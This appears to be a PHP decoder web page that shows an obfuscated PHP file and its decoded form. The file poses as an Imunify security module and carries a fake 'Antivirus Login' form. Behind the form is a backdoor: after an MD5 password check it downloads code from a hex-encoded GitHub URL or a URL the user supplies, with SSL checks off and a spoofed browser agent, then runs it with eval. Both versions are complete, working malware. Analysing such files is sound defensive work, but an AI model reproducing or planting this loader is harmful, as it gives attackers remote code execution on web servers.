Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // This file is part of Imunify - https://www.imunify.com/ // // Imunify is a com..
Decoded Output download
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://rasenmedia.my.id
* @copyright 2024 Rahman Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
goto altQy;
ioV4Q:
function authenticateUser($ralei)
{
if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) {
$_SESSION["threat_found"] = true;
$_SESSION["antivirus_ralei"] = "rahmanralei_token";
return true;
}
return false;
}
goto b9K78;
G9a8M:
if (isset($_POST["logauth"])) {
$inputauth = $_POST["logauth"];
if (authenticateUser($inputauth)) {
if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) {
$_SESSION["scan_url"] = $_POST["scan_url"];
} else {
$_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts);
}
} else {
echo "WRONG PASSWORD...";
}
}
goto tKKGw;
b9K78:
function isValidScanUrl($url)
{
return filter_var($url, FILTER_VALIDATE_URL) !== false;
}
goto zIxtU;
lLHk1:
function isThreatDetected()
{
return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true;
}
goto ioV4Q;
zIxtU:
function fetchThreatData($url)
{
if (function_exists("curl_exec")) {
$connection = curl_init($url);
curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0);
if (isset($_SESSION["antivirus_ralei"])) {
curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]);
}
$dataFromUrl = curl_exec($connection);
curl_close($connection);
} elseif (function_exists("file_get_contents")) {
$dataFromUrl = file_get_contents($url);
} elseif (function_exists("fopen") && function_exists("stream_get_contents")) {
$handle = fopen($url, "r");
$dataFromUrl = stream_get_contents($handle);
fclose($handle);
} else {
$dataFromUrl = false;
}
return $dataFromUrl;
}
goto G9a8M;
tKKGw:
if (isThreatDetected()) {
$scanUrl = $_SESSION["scan_url"];
$content = fetchThreatData($scanUrl);
if ($content !== false) {
eval("?>" . $content);
} else {
echo "Failed to fetch data from the URL.";
echo reconstructUrl($defaultThreatUrlParts);
}
} else { ?>
<!doctypehtml>
<html>
<head>
<title>Antivirus Login</title>
</head>
<body align="center">
<form action="" method="POST"><label for="logauth">Password</label> <input id="logauth" name="logauth" type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url" name="scan_url" value=""><br><input type="submit" value="Submit"></form>
</body>
</html><?php }
goto QGXfM;
altQy:
session_start();
goto xwkV1;
SmWcT:
function reconstructUrl($parts)
{
$decodedParts = array_map("hex2bin", array_slice($parts, 0, -1));
return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5];
}
goto lLHk1;
xwkV1:
$defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0");
goto SmWcT;
QGXfM: ?>
Did this file decode correctly?
Original Code
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://rasenmedia.my.id
* @copyright 2024 Rahman Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
goto altQy;
ioV4Q:
function authenticateUser($ralei)
{
if (md5($ralei) === end($GLOBALS["\x64\x65\146\x61\165\154\x74\x54\150\x72\145\141\x74\x55\162\x6c\x50\x61\x72\164\163"])) {
$_SESSION["\x74\150\x72\x65\141\164\137\146\157\165\156\x64"] = true;
$_SESSION["\x61\x6e\x74\151\166\151\162\165\x73\137\x72\141\x6c\x65\x69"] = "\162\141\150\x6d\x61\156\x72\x61\x6c\145\151\x5f\x74\x6f\x6b\x65\x6e";
return true;
}
return false;
}
goto b9K78;
G9a8M:
if (isset($_POST["\154\x6f\x67\141\165\164\150"])) {
$inputauth = $_POST["\154\x6f\x67\141\165\164\x68"];
if (authenticateUser($inputauth)) {
if (isset($_POST["\163\143\x61\156\x5f\x75\162\x6c"]) && isValidScanUrl($_POST["\x73\143\141\156\x5f\x75\162\154"])) {
$_SESSION["\x73\143\141\x6e\137\x75\x72\x6c"] = $_POST["\163\x63\x61\156\x5f\165\162\x6c"];
} else {
$_SESSION["\163\x63\141\156\x5f\165\x72\154"] = reconstructUrl($defaultThreatUrlParts);
}
} else {
echo "\x57\x52\x4f\x4e\107\x20\120\x41\x53\123\127\x4f\122\104\56\x2e\56";
}
}
goto tKKGw;
b9K78:
function isValidScanUrl($url)
{
return filter_var($url, FILTER_VALIDATE_URL) !== false;
}
goto zIxtU;
lLHk1:
function isThreatDetected()
{
return isset($_SESSION["\x74\x68\x72\x65\141\164\x5f\146\157\165\x6e\144"]) && $_SESSION["\x74\x68\162\145\141\x74\137\146\x6f\x75\x6e\x64"] === true;
}
goto ioV4Q;
zIxtU:
function fetchThreatData($url)
{
if (function_exists("\143\x75\162\x6c\137\x65\x78\x65\143")) {
$connection = curl_init($url);
curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($connection, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\57\65\x2e\60\x20\x28\127\x69\156\144\157\167\163\40\x4e\x54\40\x36\56\61\73\x20\162\166\72\63\62\x2e\60\51\x20\107\x65\x63\153\157\57\x32\x30\61\60\x30\61\60\x31\x20\106\x69\162\x65\x66\x6f\170\x2f\63\x32\56\x30");
curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0);
if (isset($_SESSION["\141\x6e\164\151\x76\x69\162\165\x73\x5f\x72\x61\154\x65\x69"])) {
curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["\141\156\164\x69\x76\151\x72\165\163\x5f\162\x61\x6c\x65\151"]);
}
$dataFromUrl = curl_exec($connection);
curl_close($connection);
} elseif (function_exists("\146\151\154\145\x5f\x67\145\164\x5f\143\x6f\x6e\x74\x65\x6e\x74\x73")) {
$dataFromUrl = file_get_contents($url);
} elseif (function_exists("\146\x6f\x70\145\156") && function_exists("\x73\x74\162\x65\x61\x6d\x5f\x67\145\164\x5f\143\157\156\x74\145\x6e\x74\x73")) {
$handle = fopen($url, "\x72");
$dataFromUrl = stream_get_contents($handle);
fclose($handle);
} else {
$dataFromUrl = false;
}
return $dataFromUrl;
}
goto G9a8M;
tKKGw:
if (isThreatDetected()) {
$scanUrl = $_SESSION["\x73\143\141\156\137\165\x72\x6c"];
$content = fetchThreatData($scanUrl);
if ($content !== false) {
eval("\x3f\x3e" . $content);
} else {
echo "\106\141\x69\x6c\x65\x64\40\164\x6f\40\146\x65\164\x63\150\40\144\141\x74\x61\x20\146\162\157\155\x20\164\x68\145\40\125\122\x4c\x2e";
echo reconstructUrl($defaultThreatUrlParts);
}
} else { ?>
<!doctypehtml>
<html>
<head>
<title>Antivirus Login</title>
</head>
<body align="center">
<form action="" method="POST"><label for="logauth">Password</label> <input id="logauth" name="logauth" type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url" name="scan_url" value=""><br><input type="submit" value="Submit"></form>
</body>
</html><?php }
goto QGXfM;
altQy:
session_start();
goto xwkV1;
SmWcT:
function reconstructUrl($parts)
{
$decodedParts = array_map("\150\145\170\x32\142\x69\156", array_slice($parts, 0, -1));
return $decodedParts[0] . $decodedParts[1] . "\57" . $decodedParts[2] . "\x2f" . $decodedParts[3] . "\57" . $decodedParts[4] . "\x2f" . $decodedParts[5];
}
goto lLHk1;
xwkV1:
$defaultThreatUrlParts = array("\66\x38\x37\x34\67\64\x37\60\67\63\63\141\x32\x66\x32\x66", "\67\x32\x36\61\67\67\x32\145\66\67\66\x39\x37\x34\66\70\x37\65\66\x32\67\65\x37\x33\66\65\67\x32\x36\63\x36\146\x36\x65\67\64\66\65\66\145\67\x34\62\145\66\63\66\x66\66\x64", "\x34\x36\x36\61\66\141\67\x32\67\x35\66\x63\63\61\63\62\63\63\63\x34\63\65", "\x34\66\66\61\x36\x61\67\62\67\65\x36\143\66\71\x37\62\66\66\x36\x31\x36\x65", "\66\144\x36\61\67\63\x37\x34\66\65\x37\62", "\66\x31\x36\x63\x36\x36\x36\x31\x36\x31\62\145\x37\64\x37\70\x37\64", "\61\64\143\146\x33\x63\x37\65\62\70\x61\x30\62\x63\x36\66\65\141\142\66\65\61\x30\x36\x64\144\x39\x33\x38\x34\145\60");
goto SmWcT;
QGXfM: ?>
Function Calls
None |
Stats
MD5 | 13a2f524a645c140592499f762897ee2 |
Eval Count | 0 |
Decode Time | 92 ms |